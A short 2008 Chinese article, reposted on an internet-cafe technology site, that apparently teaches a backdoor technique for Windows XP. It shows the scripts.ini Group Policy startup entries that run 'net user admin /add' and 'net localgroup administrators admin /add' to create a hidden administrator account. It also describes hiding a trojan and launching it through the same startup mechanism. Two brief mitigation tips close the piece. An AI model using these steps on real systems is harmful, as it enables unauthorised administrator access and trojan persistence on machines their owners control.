天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

换个角度去思考 开启后门的另一个思路

2008-2-18赛迪网佚名

  1、组策略启动脚本

  利用过程:启动组策略(运行->gpedit.msc->计算机配置->Windows 设置->脚本(启动/关机) )

  2、启动与关机相关设置

  选择启动->属性->添加,会弹出选择脚本名。选择程序 C:\windows\system32\net.exe,参数 user admin /add 来执行 net user admin /add。再同样添加C:\Windows\system32\net.exe localgroup administrators admin /add来执行 net localgroup administrators admin /add。

  费话少说: 再经过进一步了解的时候发现这里是由C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\scripts.ini(PS:默认是隐藏的。)来控制 shutdown 和 Startup 的。

  ini组成方式如下:

[Startup] 0CmdLine=C:\WINDOWS\system32\net.exe 0Parameters=user admin /add 1CmdLine=C:\WINDOWS\system32\net.exe 1Parameters=localgroup administrators admin /add [Shutdown] 0CmdLine=1.bat 0Parameters= [startup] \\代表是启动 0CmdLine=C:\WINDOWS\system32\net.exe \\脚本名 0Parameters=user admin /add \\脚本参数 1CmdLine=C:\WINDOWS\system32\net.exe \\第二条脚本名 1Parameters=localgroup administrators admin /add \\第二条脚本参数 [Shutdown] \\关闭 0CmdLine=1.bat \\脚本名 1.bat 目录队应于 C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup 0Parameters= \\参数

  也就是说 scripts.ini 控制着整个启动,就如同以前 win.ini 一样。

  C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup\ 启动文件的目录,那样脚本名路径就可以不用加详细目录名了。

  C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\shutdown\ 关闭文件目录,同上。

  思路就这样,copy 后门到非常隐藏的目录,再加个启动脚本参数,实现木马启动。

  解决此缺陷的方法:组策略->计算机配置->管理模板->系统->脚本,相应的禁止就行了。

  或者来招毒的,彻底禁止掉这个:把scripts.ini 对应用户权限全部删除,system administrators 全部取消,就没人能访问了。

  以上在 Windows XP SP2 均已测试成功。

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理,安装维护:


本文来源:赛迪网 作者:佚名

声明
本文来源地址:0
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系Email:support@txwb.com.,本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行